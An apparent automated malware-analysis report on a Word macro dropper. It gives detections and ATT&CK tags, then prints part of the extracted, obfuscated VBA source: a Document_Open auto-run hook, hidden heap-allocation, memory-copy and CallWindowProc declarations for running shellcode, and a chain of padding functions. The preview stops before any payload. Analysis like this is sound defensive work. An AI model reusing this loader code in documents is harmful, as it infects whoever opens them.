Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains VBA macros, including a Document_Open macro, indicating an attempt to execute code upon opening. The presence of obfuscated VBA code suggests the macro is designed to download and execute a secondary payload, a common technique for malware droppers. The specific macro functions and API calls hint at memory manipulation and execution, further supporting this assessment.
Heuristics (4)
- ClamAV: Doc.Dropper.Agent-6400143-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6400143-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78241 bytes |

SHA-256: 3c9a368c59bdcd32142c15582c7b12312d43085d045f265c00bac7f0d2b23416
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Win32 API imports hidden behind randomly named, mixed-case Declare statements.
' The Alias clauses reveal the real targets: CallWindowProcW, HeapCreate,
' HeapAlloc and RtlMoveMemory (heap allocation, memory copy, indirect call).
' The #If Vba7 branch supplies LongPtr-typed declarations for 64-bit Office.
#If Vba7 Then
PRIVate DeCLaRe PTrsafE FunCTIOn QFlm2dNcITrWeNVo03ro lIB "UsEr32" aLiAs "CallWindowProcW" (byvAl fmS7VYcVzYmRTs As LOnGpTR, BYvAl XketR46D aS lONGpTr, bYVAL oaHn as LonG, BYVal b20xbu As LONgptR, bYVal fOWfDAe9XOSjhC aS loNgPtr) aS lONgPtR
PriVATE decLaRE pTrSAfe fUnCtiON zXmCvbMILN lib "KeRNeL32" aLIas "HeapCreate" (bYvaL zBWMB AS Long, ByvAl ZC65TWQzDI aS loNgPtr, byVaL F40Dz6aLnO As LONgptR) AS longPTR
prIvATe DeCLare pTRSaFe FUnctIoN KfH8yJTuodzOM5JgQrvE lIb "kERNEl32" alIaS "HeapAlloc" (Byval MmhTE0 as LoNgPTr, ByVal S6RFOm aS LOng, bYvaL TLE As lONgptr) aS lOngPTR
priVATE DecLaRe pTRSAfe SUb FRI6v94whT lIB "kErNEl32" aliAS "RtlMoveMemory" (NxS aS any, byReF MR3MkjHgM9xS8 AS anY, BYVal s17 as LonG)
#Else
Private Declare Function qfLm2DNcItRWenvo03RO Lib "usEr32" Alias "CallWindowProcW" (ByVal iEXbM6Zt As Long, ByVal WxbyCvT As Long, ByVal vAqTNm As Long, ByVal sTVYApxGkdJ As Long, ByVal m33AW5VA2ZpS0Hx As Long) As Long
Private Declare Function ZXmcvBmILn Lib "KeRneL32" Alias "HeapCreate" (ByVal fket As Long, ByVal csvh40BH As Long, ByVal ybn As Long) As Long
Private Declare Function KfH8yJTuodzOM5JgQrvE Lib "KeRneL32" Alias "HeapAlloc" (ByVal HIc3vi As Long, ByVal rj2 As Long, ByVal XSGB As Long) As Long
Private Declare Sub FrI6V94wht Lib "KeRneL32" Alias "RtlMoveMemory" (tdge3tmWn9C6R As Any, ByRef I5bmO As Any, ByVal InZOc As Long)
#End If

' Auto-execution entry point: runs as soon as the document is opened.
Sub dOcUMeNt_OPen()
    Call FjqQ3jagNrSSVdY8x5cKPB
End Sub

' Long chain of single-purpose wrapper functions, each just calling the next.
' The declared return types are never used; the chain only pads call depth
' and separates Document_Open from the code that eventually does the work.
Private Function FjqQ3jagNrSSVdY8x5cKPB() As Double
    Call Oa95Kkbvc4PziElL6k5hGEN
End Function
Private Function Oa95Kkbvc4PziElL6k5hGEN() As Integer
    Call W9TSajxymLfoKnvGI9vwI9jI
End Function
Static Function W9TSajxymLfoKnvGI9vwI9jI() As Variant
    Call X1mqLzcYtZi6
End Function
Private Function X1mqLzcYtZi6() As Boolean
    Call KCTDikvjG6JFuOJhIM5
End Function
Function KCTDikvjG6JFuOJhIM5() As Object
    Call wFjiWZfq4N3S4lDa6rrukz
End Function
Function wFjiWZfq4N3S4lDa6rrukz() As String
    Call gdZO2PZioX9KkVvkW1
End Function
Private Function gdZO2PZioX9KkVvkW1() As Date
    Call RP6U5hAiJhQOBrucr5
End Function
Static Function RP6U5hAiJhQOBrucr5() As Double
    Call WW3pagLLsaTrEMjbC09
End Function
Function WW3pagLLsaTrEMjbC09() As Byte
    Call fss3lWYF1s41zwa9T4cxFi0DB
End Function
Public Function fss3lWYF1s41zwa9T4cxFi0DB() As String
    Call YW75YejJ6UNJwQvXUcpXY
End Function
Static Function YW75YejJ6UNJwQvXUcpXY() As Single
    Call uTrs8zRkurfS
End Function
Sub uTrs8zRkurfS()
    Call ixJUiVD02V5q
End Sub
Static Function ixJUiVD02V5q() As Double
    Call iS35UktV62HBwgHFiiv
End Function
Function iS35UktV62HBwgHFiiv() As Object
    Call EhPyublqQfHkcxhE6N1ic9
End Function
Function EhPyublqQfHkcxhE6N1ic9() As Object
    Call kbjoYFxuopNu8ldYUT
End Function
Private Function kbjoYFxuopNu8ldYUT() As Double
    Call OmtXWgvPw8nfYOLZqydlisN
End Function
Private Function OmtXWgvPw8nfYOLZqydlisN() As Double
    Call Gs1hoIxDM8BByUNvEgVDuwH
End Function
Private Function Gs1hoIxDM8BByUNvEgVDuwH() As Double
    Call m6l9O2bnmWvLWi3L2Ud3C2Z
End Function
Private Function m6l9O2bnmWvLWi3L2Ud3C2Z() As Integer
    Call iPRKIjLOoZRWiZHC8HnCYdRY
End Function
Static Function iPRKIjLOoZRWiZHC8HnCYdRY() As Currency
    Call XiuFXuyblI41dgMDXyqNX
End Function
Static Function XiuFXuyblI41dgMDXyqNX() As Double
    Call SGTn8G3X20ZdCOZLwujHckB
End Function
Private Function SGTn8G3X20ZdCOZLwujHckB() As Date
    Call hPMmvReCXX0sTp2oNp
End Function
Static Function hPMmvReCXX0sTp2oNp() As Integer
    Call qtPaO3XQ6rdM65Dy6pfA
End Function
Public Function qtPaO3XQ6rdM65Dy6pfA() As Boolean
    Call JNKUnTqipdyS1R
End Function
Public Function JNKUnTqipdyS1R() As Object
    Call guNXsOnzQqVZAatz0sJdS
End Function
Static Function guNXsOnzQqVZAatz0sJdS() As Single
    Call q1BqcXfcgV3s
End Function
Public Function q1BqcXfcgV3s() As Long
    Call TQ0rJq ...
```

(truncated)